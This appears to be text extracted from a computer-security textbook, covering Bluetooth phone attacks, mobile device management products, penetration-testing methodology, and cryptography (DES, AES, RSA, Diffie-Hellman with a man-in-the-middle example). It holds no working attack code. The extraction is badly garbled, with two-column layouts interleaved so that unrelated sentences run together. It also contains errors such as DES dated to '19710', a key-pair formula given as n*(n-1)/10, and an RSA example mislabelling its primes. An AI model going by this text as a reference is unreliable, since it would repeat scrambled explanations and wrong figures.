on phone conversations, make phone calls and send or receive text messag- Bluejacking is a mostly harmless activity. Though it is an unintended use
es. Bluebugging has a similar result to bluesnarfing but exploits a different of a technical feature, most hard-core geeks do not find sufficient technical
vulnerability that is found in older phones.

challenge in the activity. For the more serious hacker, looking to explore B. Blackberry Enterprise by Blackberry
the security features of their Handset, more technically demanding sport is
Produced as Blackberry
required.
Enterprise Service 12 func-
tions on platforms iOS,
Android, Extended Android
7. MOBILE DEVICE MANAGEMENT Tools are transforming into enter-
APIs (Motorola; Samsung;
prise mobility management (EMM), which includes app and data security,
KNOX), and Blackberry be-
among many other things. And while all the major offerings in this arena
ing some of them and while
cover the basics when it comes to hardware management, there are differ-
for others, like Symbian, it
ences when it comes to some of the extended features you may require.
has been planned for 2015.
MDM Features and Functions
BES is generally deployed
A. AirWatch by VMWare as a series of individual
Windows services. Each
Produced as AirWatch Enterprise service handles unique messaging elements such as attachments, collab-
Mobility Management functions oration, device status, messaging, master data service (MDS) connections,
on mobile platform such as iOS, policies and synchronization. Services can be installed and managed indi-
Android, Extended Android APIs vidually, allowing an organization can deploy the level of BlackBerry support
(Samsung KNOX and SAFE; LG and control that best suits their requirements. A messaging administrator,
Gate; Motorola; MOTO MX; Kin- sometimes referred to as a BES Administrator, is typically tasked with sup-
dle Fire; Nook HD; HTC; Dell; Le- porting the BES services.
novo; Huawei; Panasonic), Black-
berry, Windows Phone, Symbian. Recently, RIM announced plans for an upgrade that will allow administra-
Like other MDM suites, AirWatch tors to use BES to manage and support Apple and Android mobile devices.
serves the administrative area
A free version of BES (BES Express) provides much of the functionality
dealing with deploying, securing,
found in the full version of BES.
monitoring, integrating and managing mobile devices, such as smartphones,
tablets and notebooks, in the workplace.
AirWatch allows mobile devices of many different models, running different C. Citrix
operating systems, to deliver applications traditionally constrained to the
Originally produced as Ci-
PC, such as corporate email and databases, while maintaining device and
trix XenMobile functions on
network security.
platforms like iOS, Android,
Mobile device management can be very complex. Multiple types of devices Blackberry, Extended Android
require support and security issues can arise from coordinating devices, APIs, Windows Phone and
applications and mobile workers. Those efforts also require a lot of resourc- others like SAFE, KNOX and
es, including time, money and experienced personnel. MDM software helps HTC. The centerpiece of Ci-
enterprise offload that burden. trix XenMobile is Worx, a line
of managed mobile applica-
tions. Citrix offers Worx apps
for secure email access, Web
browsing and file sharing;
more significantly, third-party developers can make Worx-enabled versions
of their apps by adding one line of code to the software. IT administrators
can make Worx apps as well as approved Windows and SaaS apps -- avail-
able to users through XenMobiles enterprise app store.
Citrix XenMobiles mobile management software is available in three edi-
tions: MDM-only, MAM-only and a version that offers all features.

F. Microsoft
D. Good Technology Launched as Microsoft Intune (orig-
inally Windows Intune) boasts on its
Product was original-
deployment options. On-Premises op-
ly launched as Good EMM
tions like Integrated Solution, System
Suites functions on every
Centre and Configuration Manager. It
common mobile platform like
comes with mixed deployment options
iOS, Android nd Blackberry. It
such as Cloud and SaaS.
offers Mobile Device Manage-
ment (MDM) including user It is a cloud-based desktop and mobile
self-service and allows unlimited devices per user. device management tool that helps
organizations provide their employees with access to corporate applications,
It provides secure intranet access and web browsing and network security
data, and resources from the device of their choice.
over platforms like Samsung Knox. It has its own simple, single interface to
access all Good-secured apps, with integrated app store. The product boasts It is a component of Microsofts Enterprise Mobility Suite (EMS), which helps
with Cloud, on premise, and mixed deployment options such as SaaS. maximize user productivity while protecting corporate data by restricting ac-
cess to Exchange email and OneDrive for business documents when a user
tries to access resources on an unenrolled or non-compliant device.
E. IBM
Admins can integrate their existing System Centre Configuration Manager
IBM named its MDM product with Intune and collect information about hardware configurations and soft-
IBM MobileFirst Protect. IBM ware installed on managed computers.
MobileFirst Platform is a group
of products designed to simpli-
fy and accelerate mobile adop- G. MobileIron
tion by offering mobile application development and management in a single
Produced as
package.
MobileIron Plat-
IBM launched MobileFirst in 2013 and reorganized the product line into inum Bundle.
these four modules in 2015: This marks the
third year in a
ith Continuously Improve, IT can manage application refresh cy-
W
row that Mobil-
cles and collect in-app usage analytics;
eIron has been
S
ecure includes the former Fiberlink MaaS360 as an enterprise mo- named to the leaders quadrant in MDM. Its MDM offering is largely an
bility management product. In addition to a secure gateway and pro- on-premises appliance-based device, though it does have a SaaS offering.
ductivity suite, this module also includes threat management, identity Gartner notes its main MDM products are the mobile policy configures en-
management and file-sharing features; gine VSP 5.5 and Sentry, though it also offers mobile software and content
management products. Gartner recommends MobileIron for companies of all
evelopers can use Contextualize and Personalize to create mobile
D sizes, especially if they want an appliance model.
apps that are location- and context-aware; and
MobileIrons on premise mobility platform is packaged as an easy-to-install
sing Enrich with Data, IT can join its mobile apps to internal and
U software or hardware appliance. Designed for efficiency, it plugs into your
external data sources by connecting directly with the Cloudant data- corporate network and is usually ready to manage devices in less than a
base as a service. day. The on premise MobileIron solution can be licensed on a perpetual or
IT can purchase each module separately and deploy them in one of three subscription basis. This deployment model is best when IT wants to manage
ways: on-premises, in the cloud or in hybrid environments. IBM allows orga- its mobile software infrastructure.
nizations to choose between monthly, perpetual or pay-as-you-go licenses.

The MobileIron mobility platform is also available as a cloud deployment. uct is to do real time remote control. Being the reason SOTI MobiControl
The MobileIron Cloud solution integrates tightly with on premise enterprise supports all the key operating systems. SOTI has its own API stat which let
messaging and security systems, such as corporate email and corporate users to push policies across device ecosystem be it Samsung, HTC, ZTE or
directories and is best when IT wants their mobile software infrastructure any of them.
managed externally. The cloud deployment option is offered on a subscrip-
With its simple interface, SOTI provides a tech support; so instead of bring-
tion basis.
ing your device to tech user can just contact tech and tech will troubleshoot
the problems remotely. MobiControl gives root user the ability to send mes-
sages remotely over devices as a pop up.
H. SAP
With all the other functions it has deployment options like Cloud and SaaS.
Sap offers various products like SAP
Mobile Secure, SAP Mobile Device
Management, SAP Mobile Docu-
J. Symantec
ments, SAP Mobile Place, and SAP
Mobile App Protection by Mocana. Symantec named its
An innovative solution that separates product Symantec:
app security and management from Mobility Suite. Syman-
core application development, en- tec was among the first
abling enterprises to secure their mo- wave of security ven-
bile apps in seconds, without writing or modifying any code. SAP Mobile App dors to extend pro-
Protection also enables bring-your-own-device (BYOD) environments with tection to the growing
safe, secure communications and helps organizations meet industry compli- number of mobile devices making their way onto corporate networks, and
ance and auditing requirements, including HIPAA, PCI and Sarbanes-Oxley. its strength and experience in this area helped its Mobile Security Suite 5.0
offering win silver.
The suite is heavy on antimalware capabilities, including protection against
Mocanas Atlas Platform is
viruses through scheduled and on-demand file scans. It also is able to stop
a modern platform that com-
SMS spam through message filtering. The Mobile Security Suite, unlike
plements SAP Mobile Secure
some other competitive offerings, includes a full firewall, with inbound and
solutions and SAP Mobile
outbound network traffic control. Along with file encryption and a file activ-
App Protection to secure-
ity log, the offering also integrates with Symantecs Mobile VPN for network
ly extend the personalized,
access control.
responsive SAP Fiori user
experience into the mobile Users rated Mobile Security Suite highly for malware protection and also
realm and promote the wide- praised its range of device coverage, which includes any device running Win-
spread adoption and usage dows Mobile. The suite also drew compliments for its ease of management
of apps that apply the SAP and its return on investment.
Fiori UX across the enter-
prise. The Mocana Atlas platform simultaneously maximizes usability, secu- This product comes with 4 different editions:
rity, scale and visibility for connected mobile apps. MAM Only (Mobile Application Management)
MCM Only (Mobile Content Management)
I. SOTI MDM Only (Mobile Device Management)
Mobile Threat Protection
With the launch of
product SOTI MobiCon- Features
trol, SOTI gave users Password Protection and Reset
the ability to manage
Remote Device Wipe
their devices remotely.
Key feature in this prod- Selective Wipe

Remote Lock App-level Micro VPN
Set VPN, APN, Wi-Fi, Proxy/Gateway settings Multifactor device/app authentication
Disable carrier Data and Connection Malware Detection
Configuration Monitoring and Auditing Includes Firewall
Automated Provisioning/Enrolment Single Sign-On Support
Disable Camera Document/Content management
Disable Bluetooth Encrypted document container
Manage Mobile attached devices (e.g. Printers, Scanners) Secure email
Supports Multi User per Device File server access
Application Management Secure SharePoint access
User self-service app delivery Integrates with enterprise document management software
Full-featured Enterprise app store Network Management
Containerization/Sandboxing Data usage management
App containerization using developer SDK/toolkit Roaming cost control
App containerization using app wrapping Device diagnostics
Block copy/paste between apps Usage monitoring
Block copy/paste from emails Block device from accessing email if policies violated
Restrict which apps can open a given file Service Management
App inventory tracking Help desk support management
App usage monitoring Service monitoring
A
pple volume purchase program integration (decrements volume Remote control of device
purchase agreement quantity available as users download apps from User self-service portal
store)
Integration with PC management tools
Remote desktop access
Offers a separate or integrated PC management tool
Security
Integrates with a third party tool
Secure Web Browser
Offers integrated management console for PC and mobile management
Application Blacklisting/Whitelisting
O
ffers integrated app store for both desktop and mobile app deploy-
Data Loss Prevention (DLP) ment
Email attachment data loss prevention Reporting
Device compromise detection (jailbreak/rooting) Alerts
Device level-encryption Automated responses to alerts
Encrypted Folder Automated, Scheduled report delivery
Encrypted email attachments Real-time dashboards
Encrypted email message body Device-level analytics
Geofencing App-level analytics
Time Fencing
Mobile VPN

Chapter 9. What is Pen-Testing?
A penetration test is a method of evaluating the security of a computer
Penetration Testing Methodologies system or network by simulating an attack from a malicious source, known
as a Black-Hat Hacker.
Penetrations tests offer an excellent method of identifying how your security
PENETRATION TESTING is working overall in your organization.
Penetration testing is the process of attempting to gain access to resources
without knowledge of usernames, passwords and other normal means of
access.
The main thing that separates a penetration tester from an attacker is per-
mission. The penetration tester will have permission from the owner of the
computing resources that are being tested and will be responsible to provide
a report. The goal of a penetration test is to increase the security of the com-
puting resources being tested.
Pen-Testing v/s Vulnerability Assessment

A vulnerability assessment is the process of identifying, quantifying,
and prioritizing (or ranking) the Weakness in a system. Wikipedia There is often some confusion between penetration testing and vulnerability
assessment.
Vulnerability assessment is a process that defines, identifies, and classifies
the security holes (vulnerabilities) in a computer, network or communica-
tions infrastructure.
Vulnerability Assessment:
In simple terms it is a way to find the loopholes or weakness in a system or
Typically, general in scope and includes a large assessment.
network.
Predictable.
A key component of the vulnerability assessment is properly defining
the ratings for impact of loss and vulnerability. Unreliable at times and high rate of false positives.
Professionals with specific training and experience in these areas are ulnerability assessment invites debate among System
V
required to perform these detailed analyses. Administrators.
Produces a report with mitigation guidelines and action items.
Penetration Testing:
ocused in scope and may include targeted attempts to exploit specific
F
vectors (Both IT and Physical)
Unpredictable by the recipient. (Dont know the how? and when?)
Highly accurate and reliable. (Ive got root!)
Penetration Testing = Proof of Concept against vulnerabilities.
Produces a binary result: Either the team owned you, or they didnt.

Why perform Pen-Testing? 3) Verify secure configuration:
There are a variety of reasons for performing a penetration test. One If the CSO (or security team) are confident in their actions and final results,
of the main reasons is to find vulnerabilities and fix them before an attacker the penetration test report verifies that they are doing a good job. Having an
does. Sometimes, the IT department is aware of reported vulnerabilities but outside entity verify the security of the system provides a view that is devoid
they need an outside expert to officially report them so that management of internal preferences. An outside entity can also measure the teams effi-
will approve the resources necessary to fix them. Having a second set of eyes ciency as security operators. The penetration test doesnt make the network
check out a critical computer system is a good security practice. Testing a more secure, but it does identify gaps between knowledge and implementa-
new system before it goes on-line is also a good idea. Another reason for a tion.
penetration test is to give the IT department at the target company a chance
to respond to an attack.
In a sense, think of a Penetration Test as an annual medical physical. Even 4) Security training for network staff:
if you believe you are healthy, your physician will run a series of tests (some
old and some new) to detect dangers that have not yet developed symptoms. Penetration testing gives security people a chance to recognize and respond
to a network attack. For example, if the penetration tester successfully com-
promises a system without anyone knowing, this could be indicative of a
failure to adequately train staff on proper security monitoring. Testing the
1) Find Holes Now Before Somebody Else Does:
monitoring and incident handling teams can show if they are able to figure
At any given time, attackers are employing any number of automated tools out what is going on and how effective their response is. When the security
and network attacks looking for ways to penetrate systems. Only a handful staff doesnt identify hostile activity, the post-testing reporting can be used
of those people will have access to 0-day exploits; most will be using well to help them hone their incident response skills
known (and hence preventable) attacks and exploits. Penetration testing
provides IT management with a view of their network from a malicious point
of view. The goal is that the penetration tester will find ways into the net- What is a good Pen-Test?
work so that they can be fixed before someone with less than honourable
intentions discovers the same holes stablishing the parameter for penetration test such as objectives,
E
limitations & the justification of procedures.
Hiring skilled & experienced professional to perform the test.
2) Report problems to management: Choosing suitable set of tests that balance cost & benefits.
Often an internal network team will be aware of weaknesses in the security Following a methodology with proper planning & documentation.
of their systems but will have trouble getting management to support the Stating the potential risks & findings clearly in the final report.
changes that would be necessary to secure the system. By having an outside
Common mistakes organizations do when performing Pen-Test
group with a reputation for security expertise analyses a system. Manage-
ment will often respect that opinion more. Furthermore, an outside tester Limit the test to running a vulnerability scanner.
has no vested interest in their results. Inside a corporation of any size, there
Testing components in isolation
will be political struggles and resource constraints. Administrators and te-
chies are always asking for budget increases for new technology. Company changes environment while test is being performed.
verlooking critical relationships, such as suppliers, partners
O
By using an independent third party to verify the need, management will have an
and outsourcing/off shoring vendors.
additional justification for approving or denying the expenditure of money on se-
curity technologies. Similarly, system administrators who know the intricacies of Types of Penetration Testing
their environment are often aware of how to compromise their network. As such, 1) Black-Box penetration testing (External)
it is not uncommon for management to assume that without such knowledge, an
attacker would be unable to gain unauthorized entry. By using a third party who 2) White-Box penetration testing (internal)
operates with no inside knowledge, the penetration testing team may be able to Announced testing
identify the same vulnerability and help convince management that it needs to Unannounced testing
be resolved. A penetration testing team may also be able to prove that an exploit
exists while the internal network staff knew it was there but wasnt quite able to 3) Grey-Box penetration testing
pull all the pieces together to demonstrate the exploit effectively.

White-Box Penetration Testing
ou will be given complete knowledge of the infrastructure that needs

Y
to be tested.
This test simulates the process of companys employees.
You will be provided information such as:
Company infrastructure.
Network type.
Current security implementation
IP address /Firewall /IDS details
Black-Box Penetration testing Company policies DOs & DONTS
No prior knowledge of the infrastructure to be tested.

You will be given just a company name.
enetration test must be carried out after extensive information gath-
P
ering and research.
This test simulates the process of a real hacker.
It takes considerable amount of time allocated for the project on dis-
covering the nature of the infrastructure and how it connects and
interrelates.
Time consuming and expensive type of test.
Announced / Unannounced Testing
Announced Testing:
Is an attempt to compromise systems on the client with the full coop-
eration and knowledge of the IT staff.
xamines the existing security infrastructure of possible vulnerabili-
E
ties.
Involves the security staff on the penetration testing teams to conduct
these audits.

Unannounced Testing: Telephone security assessment
Is an attempt to compromise systems on the client networks without Social engineering
the knowledge of IT security personnel.
Allows only the upper management to be aware of these tests.
xamines the security infrastructure and responsiveness of the IT
E
staff.
Grey-Box Penetration Testing

In a grey box test, the tester usually has a limited knowledge of infor-
mation. External penetration testing
It performs security assessment and testing internally. It is the traditional approach to penetration testing.
A
pproaches towards the application security that test for all vulnera- It may be performed with no prior knowledge of the site (black box).
bilities which a hacker may find and exploit. It may be performed with no prior knowledge of the site (black box).
P
erformed mostly when a penetration tester starts a black box test on Full disclosure of the topology and environment (white box).
well-protected systems and finds that a little prior knowledge is re-
quired in order to conduct a thorough review.
External penetration testing involves a comprehensive analysis of available
Grey-box testing is also known as translucent testing. information about the target, such as:
Grey-box testing is well suited for web applications. Web Servers
Mail Servers
Strategies of Penetration Testing Domain names
External penetration testing Vulnerabilities
Internal security assessment
Application security assessment
Network security assessment
Wireless security assessment

Internal security assessment Types of Application security assessment
T
esting will be performed from a number of network access points, S
ource code review: Analyses the application-based code to confirm
representing each logical and physical segment. that it does not contain any sensitive information that an attacker
F
or example, this may include tiers and DMZs within the environ- might use to exploit an application.
ment, the corporate network or partner company connections. A
uthorization testing: Tests the systems responsible for the com-
A
n internal security assessment follows a similar methodology to ex- mencement and maintenance of user sessions. Identifies the permis-
ternal testing, but provides a more complete view of the site security. sion status of logged-in system in case of unauthorized access.
F
unctionality testing: Involves the testing of systems that are respon-
sible for the applications functionality accessible to a user.
W
eb application testing: Involves a web application such as J2EE,
ASP.NET and PHP etc. Helps to identify web application vulnerabilities
such as SQL injection problems, XSS, XSRF, weak authentication and
source code exposure.
Network security assessment

It scans the network environment for identifying vulnerabilities and
helps to improve an enterprises security policy.
It uncovers network security faults that can lead to data or equipment
being cooperated or destroyed by Trojans, denial of service attacks and
other intrusions.
It ensures that the security implementation actually provides the pro-
tection that the enterprise requires when any attack takes place on a
Application security assessment network, generally by exploiting a vulnerability of the system.
E
ven in a well-deployed and secured infrastructure, a weak applica-
tion can expose the organizations crown-jewels to unacceptable risk. Wireless security assessment
A
pplication Security Assessment is designed to identify and assess threats Wireless assessment addresses the security risks associated with an in-
to the organization through bespoke, proprietary applications or systems. creasingly mobile workforce.
T
his test checks on application so that a malicious user cannot ac- Wireless testing:
cess, modify or destroy data or services within the system.
802.11a/b/g/n
Bluetooth
GHz signals
Wireless radio transmissions
Radio communication channels

Methodology of Pen-Testing
Intelligence gathering
Scanning
Assessment
Exploitation
Post-Exploitation
Covering Tracks
Report Writing
Telephone Security Assessment
A telephony security assessment addresses security concerns relating
to corporate voice technologies.
This includes abuse of PBXs by outsiders to route calls at the targets
expense, mailbox deployment and security, voice over IP (VoIP) integra-
tion, unauthorized modem use, and associated risks.
Social Engineering
Social engineering addresses a non-technical kind of intrusion.
Social engineering is commonly understood to mean the art of manipu-
lating people into performing actions or divulging confidential informa-
tion. Wikipedia
Social engineering can bypass firewall, IDS, IPS, Honey pots, DMZ.
The weakest link in any organization is not computer, its Human.

CHAPTER 10 10.2 Symmetric key Cryptography
It is also called conventional or private-key or single-key or secret key.
CRYPTOGRAPHY Sender and recipient share a common key. With secret key cryptography,
a single key is used for both encryption and decryption. The sender uses
the key (or some set of rules) to encrypt the plaintext and sends the ci-
pher text to the receiver. The receiver applies the same key (or rule set)
Objective
to decrypt the message and recover the plaintext. Because a single key is
10.1 Introduction used for both functions, secret key cryptography is also called symmetric
encryption. With this form of cryptography, it is obvious that the key must
10.2 Symmetric key Cryptography be known to both the sender and the receiver; that, in fact, is the secret.
10.3 Symmetric key Algorithms
Method of Encrypting Message
10.4 Asymmetric Key Algorithms
10.5 Diffie Hellman key Exchange Stream ciphers
10.6 Introduction to Digital Certificate Block ciphers.
10.7 Public Key Infrastructures and Certificate Authorities (1) Stream ciphers: Stream ciphers can encrypt a single bit/byte of plain-
text at a time. Stream ciphers come in several flavours but two are
worth mentioning here.
10.1 Introduction
During the time when the Internet provides essential communication between
tens of millions of people and is being increasingly used as a tool for com-
merce, security becomes a tremendously important issue to deal with. There
are many aspects to security and many applications, ranging from secure com-
merce and payments to private communications and protecting passwords.
The origin of the word cryptology lies in ancient Greek. The science of cryp-
tology is the science of secure communications, formed from the Greek words
crypto, hidden, and logos, word. Cryptology is the practice and study of
hiding information. Cryptology is as old as writing itself, and has been used
for thousands of years to safeguard military and diplomatic communications.
There are two main types of cryptography:
Synchronous Stream Cipher
Synchronous stream cipher keys are generated at a different time than during
Secret key cryptography: Secret-key encryption uses one key, the secret the encryption process. Keys are generated independently of the plaintext or
key, to both encrypt and decrypt messages. This is also called symmet- cipher text. The sender and receiver need to be in synchrony with the state of
ric encryption. The term private key is often used inappropriately to the key. As stated above any bit that has been changed due to corruption or
refer to the secret key. unintentional modification does not affect the deciphering of other bits. How-
ever, when cipher text characters are deleted or inserted then synchronization
Public key cryptography: It also called asymmetric encryption uses a
pair of keys for encryption and decryption. With public key cryptogra- is lost.
phy, keys work in pairs of matched public and private keys. The public
key can be freely distributed without compromising the private key,
which must be kept secret by its owner. Because these keys work only
Asynchronous Stream Cipher
as a pair, encryption initiated with the public key can be decrypted only
with the corresponding private key. Asynchronous stream ciphers generate key streams as a function of the key
and a set number of former cipher text bits. The advantage is that if cipher
text bits are inserted or deleted the decipher stream can self-heal by re-syn-

chronization, which results in only a loss of possibly a few characters. Fur- The algorithm involves carrying out combinations, substitutions and permu-
thermore, asynchronous stream ciphers have better diffusion statistically tations between the text to be encrypted and the key, while making sure the
than synchronous stream ciphers. An example of this is a DES stream in the operations can be performed in both directions (for decryption). The combina-
CFB mode. A5 is an example of a stream cipher for GSM thats used in cellu- tion of substitutions and permutations is called a product cipher.
lar phones. Example of Stream Ciphers is A5, the algorithm used to encrypt
The main parts of the algorithm are as follows:
GSM communications, is a stream cipher. The RC4 cipher and the one-time
pad are also stream ciphers. Fractioning of the text into 64-bit (8 octet) blocks;
Initial permutation of blocks;
(2)Block ciphers
Breakdown of the blocks into two parts: left and right, named L and R;
Permutation and substitution steps repeated 16 times (called rounds);
Re-joining of the left and right parts then inverse initial permutation.
Steps in DES
Block ciphers take a number of bits (typically 64 bits in modern ciphers) and
encrypt them as a single unit. In general, the same plaintext block will always
encrypt to the same cipher text when using the same key in a block cipher
whereas the same plaintext will encrypt to different cipher text in a stream
cipher.
A block cipher method called chaining can be used to make a much more se-
cure cipher text message. The basic idea behind chaining is to use the cipher
text of the previous block to encrypt the current block. Although there may be
different ways to do this, almost all ciphers that use chaining follow the rules
outlined on this page.
DES is a block cipher with a 64-bit block size. AES is a block cipher with a 1. Initial permutation
128-bit block size. RSA and Diffie-Hellman are block ciphers with variable
block sizes. Firstly, each bit of a block is subject to initial permutation, which can be rep-
resented by the following initial permutation (IP) table:
10.3 Symmetric Key Algorithms 58 50 42 34 26 18 10 2

60 52 44 36 28 20 12 4
(DES) Data Encryption Standard 62 54 46 38 30 22 14 6
64 56 48 40 32 24 16 8
The DES algorithm based on LUCIFER, designed by Horst Feistel, was devel-
oped at IBM in 19710. This algorithm was approved by the National Bureau of 57 49 41 33 25 17 9 1
Standards (now NIST) after assessment of DES strength and modifications by 59 51 43 35 27 19 11 3
the National Security Agency (NSA), and became a Federal standard in 1977. 61 53 45 37 29 21 13 5
DES uses the Data Encryption Algorithm (DEA), a secret key block-cipher 63 55 47 39 31 23 15 7
employing a 56-bit key operating on 64-bit blocks

This permutation table shows, when reading the table from left to right then
The Feistel function (F function) of DES
from top to bottom, that the 58th bit of the 64-bit block is in first position,
the 50th in second position and so forth. Keys Transformation Given that the DES algorithm presented above
2. Division into 32-bit blocks (LPT and RPT): is public, security is based on the complexity of encryption keys. The
Once the initial permutation is completed, the 64-bit block is divided algorithm below shows how to obtain, from a 64-bit key (made of any
into two 32-bit blocks, respectively denoted L and R (for left and right). 64 alphanumeric characters), 8 different 48-bit keys each used in the
DES algorithm:
It is interesting to note that L0 contains all bits having an even position in
the initial message, whereas R0 contains bits with an odd position.
58 50 42 34 26 18 10 2
60 52 44 36 28 20 12 4
L0
62 54 46 38 30 22 14 6
64 56 48 40 32 24 16 8
-
57 49 41 33 25 17 9 1
59 51 43 35 27 19 11 3
R0
61 53 45 37 29 21 13 5 ExpansionPermutation The 32-bit half-block (RPT) is expanded to
63 55 47 39 31 23 15 7 48 bits using the expansion permutation, denoted E in the diagram, by
duplicating half of the bits. The output consists of 8 6-bit pieces, each
3. Rounds The Ln and Rn blocks are subject to a set of repeated transfor- containing a copy of 4 corresponding input bits, plus a copy of the im-
mations called rounds, shown in this diagram and the details of which mediately adjacent bit from each of the input pieces to either side.
are given below:
S Box - Substitution after mixing in the sub key, the block is divided
into eight 6-bit pieces before processing by the S-boxes or substitution
boxes. Each of the eight S-boxes replaces its six input bits with four out-
Details of One Round in DES put bits according to a non-linear transformation, provided in the form
of a lookup table. The S-boxes provide the core of the security of DES
without them, the cipher would be linear, and trivially breakable.

P Box - Permutation finally, the 32 outputs from the S-boxes is re-
arranged according to a fixed permutation, the P-box. This is designed
so that, after expansion, each S-boxs output bits are spread across 6
different S boxes in the next round.
TDES an alternative to the DES
In 1990, Eli Biham and Adi Shamir developed differential cryptanalysis, which
searches for plaintext pairs and cipher text pairs. This method works with up
to 15 rounds.
Moreover, while a 56-bit key gives an enormous amount of possibilities, many

processors can compute more than 106 keys per second; as a result, when
they are used at the same time on a very large number of machines, it is pos-
sible for a large body (a State for example) to find the right key.
Like DES, AES is a symmetric block cipher. This means that it uses the same
A short-term solution involves catenating three DES encryptions using two key for both encryption and decryption. However, AES is quite different from
56-bit keys (which equals one 112-bit key). This process is called Triple DES, DES in a number of ways. The algorithm Rijndael allows for a variety of block
denoted TDES (sometimes 3DES or 3-DES). and key sizes and not just the 64 and 56 bits of DES block and key size. The
block and key can in fact be chosen independently from 128, 160, 192, 224,
256 bits and need not be the same.
However, the AES standard states that the algorithm can only accept a block
size of 128 bits and a choice of three keys - 128, 192, 256 bits. Depending
on which version is used, the name of the standard is modified to AES-128,
AES-192 or AES- 256 respectively. As well as these differences AES differs
from DES in that it is not a feistel structure. In this case the entire data block
is processed in parallel during each round using substitutions and permuta-
tions.
A number of AES parameters depend on the key length. For example, if the
key size used is 128 then the number of rounds is 10 whereas it is 12 and 14
for 192 and 256 bits respectively. At present the most common key size likely
to be used is the 128 bit key. This description of the AES algorithm therefore
TDES is much more secure than DES, but it has the major disadvantage of describes this particular implementation.
also requiring more resources for encryption and decryption.
AES was designed to have the following characteristics:
AES
Resistance against all known attacks.
The Advanced Encryption Standard (AES) is a specification for the encryption
of electronic data established by the U.S. National Institute of Standards and Speed and code compactness on a wide range of platforms.
Technology (NIST) in 2001. Originally called Rijndael, the cipher was devel-
Design Simplicity.
oped by two Belgian cryptographers, Joan Daemen and Vincent Rijmen, who
submitted to the AES selection process.

Key Generation Algorithm
Key management: Example:
1. Choose two very large random prime integers: p and q
When A wants to communicate only with B, we need one lock-and-key
pair (A-B). 2. Compute n and (n): n = pq and (n) = (p-1)(q-1)
When A wants to communicate with B & C, we need two lock-key pairs 3. Choose an integer e, 1 < e <(n) such that: gcd(e, (n)) = 1
(A-B and A-C) 4. Compute d, 1 < d <(n) such that: ed 1 (mod (n))
If four persons want to communicate with each other, we need 6 pairs. the public key is (n, e) and the private key is (n, d)
A-B, A-C, A-D, B-C, B-D, & C-D.
the values of p, q and (n) are private
In general, for n persons, number of lock and key pair is n*(n-1)/10. For
1000 persons, we need 1000*999/2=499,500. e is the public or encryption exponent
d is the private or decryption exponent
10.4 Asymmetric cryptography (public-key cryptography) Encryption: Decryption:
Asymmetric cryptography or public-key cryptography is cryptography in The cypher text C is found The message M can be
which a pair of keys is used to encrypt and decrypt a message so that it ar- by the equation found form the cypher
rives securely. Initially, a network user receives a public and private key pair text C by the equation
C = Me mod n
from a certificate authority. Any other user who wants to send an encrypted
M = Cd mod n.
message can get the intended recipients public key from a public directory. where M is the original mes-
They use this key to encrypt the message and they send it to the recipient. sage.
When the recipient gets the message, they decrypt it with their private key,
which no one else should have access to.
Public Key (Asymmetric Key) Algorithms: Example

This is an extremely simple example and would not be secure using primes so
Diffie-Hellman Key exchange protocol small, normally the primes p and q would be much larger.
RSA Public key encryption and digital signatures 1. Select the prime integers q=11, q=3.
ElGamal Public key encryption and digital signatures 2. n=pq=33; (n)=(p-1)(q-1)=20
DSA Digital signatures
3. Choose e=3Check gcd(3,20)=1
4. Compute d=7
The RSA Algorithm
The RSA algorithm is used for both public key encryption and digital signa- (3) d 1 (mod 20)
tures. It is the most widely used public key encryption algorithm. The basis
of the security of the RSA algorithm is that it is mathematically infeasible to Therefore the public key is (n, e) = (33, 3) and the private key is (n, d) = (33, 7)
factor sufficiently large integers. The RSA algorithm is believed to be secure if
its keys have a length of at least 1024-bits.

Encryption Decryption K1 = Bx mod n
Now say we wanted to encrypt the The decryption of C is performed as
message M=7 follows. B now computes the secret key K2 as follows:
C = Me mod n M = Cd mod n K2 = Ay mod n
C = 73 mod 33 M = 137 mod 33
C = 343 mod 33 M = 62,748,517 mod 33
Mathematical Theory behind Algorithm
C = 13 M = 7
As you can see after the message has been encrypted and decrypted the final K1 = Bx mod n&B = gy mod n
message M is the same as the original message M. A more practical way to
use the algorithm is to convert the message to hexadecimal and perform the Therefore, K1 = (gymod n) x mod n
encryption and decryption steps on each octet individually. Now K2 = Ay mod n & A=gx mod n
Therefore, K2 = (gxmod n)y mod n
10.5 Diffie Hellman key Exchange
Thus basic mathematics says that K1=K2
Diffie & Hellman devised a solution to the problem of key agreement or key ex-
change. Two parties, who want to communicate securely, can agree on sym-
metric key. This key can be used for encryption/decryption. Algorithm is used If Alice & Bob both can calculate K independently, then WHY NOT ATTACK-
only for key exchange not for encryption/decryption. ER?
Once both the parties agree on the key to be used, they need to use oth- Alice and Bob exchange n, g, A and B.
er symmetric key encryption algorithms for actual encryption/decryption of
messages. Algorithm gets it security from the difficulty of calculating discrete Based on these values, x (value known only to Alice) and y (value known
logarithms in a finite field, as compared with the ease of calculating exponen- only to Bob) cannot be calculated easily.
tiation in the same field.
Mathematically the calculations to find out x & y are extremely compli-
cated, if they are sufficiently large numbers.
Description of Algorithm An attacker cant calculate x & y, and therefore cant derive K.
Firstly, Alice & Bob agree on two large prime numbers, n & g. These
two integers need not be kept secret. Alice & Bob can use an insecure Problems with the Algorithm
channel to agree on them.
Alice wants to communicate with Bob securely, she will do first Dif-
Alice choose another large random number x, & calculate A such that: fie-Hellman key exchange.
A=gx mod n She sends the values of n & g to Bob, which will form the basis of Al-
iceA& Bobs B, which will be used to calculate K1=K2=K.
Alice sends the number A to Bob.
Alice Tom Bob
Bob independently chooses another large random integer y and calcu-
n=11, g=7 n=11, g=7 n=11, g=7
lates B such that:
Attacker Tom is listening; he picks up the values and also forwards
B = gy mod n them to Bob.
Bob sends the number B to Alice. Let us assume that Alice, Tom, & Bob select random numbers x & y.
A now computes the secret key K1 as

Alice Tom Bob Thats why Tom needed both sets of the secret key variables x & y, and
also non-secret variables A & B.
x=3 x=8,y=6 y=9
The man-in-the-middle attack can work against the Diffie-Hellman key
exchange algorithm, causing it to fail.
Why does Tom select both x & y??? Based on above values all three
calculate the values of A & B. Alice & Bob calculate A & B resp, Tom
calculates both A & B
Problems with the Public Key Exchange
Throughout the discussion, we assume that Alice knows the value of
Man in the middle Attack public key of the Bob (sender), and Bob knows the value of public key
of the Alice (receiver).
Alice sends her A (i.e. 2) to Bob. Tom intercepts it, and, sends his A (i.e.
9) to Bob. Alice can simply send her public key to Bob and request for Bobs Pub-
lic key, in turn.
In return, Bob sends his B (i.e. 8) to Alice. Tom intercepts it, and in-
stead, sends his B (i.e. 4) to Alice. The man-in-the-middle attack can be launched by Tom.
At this stage, Alice, Tom & Bob have the values of A & B as shown
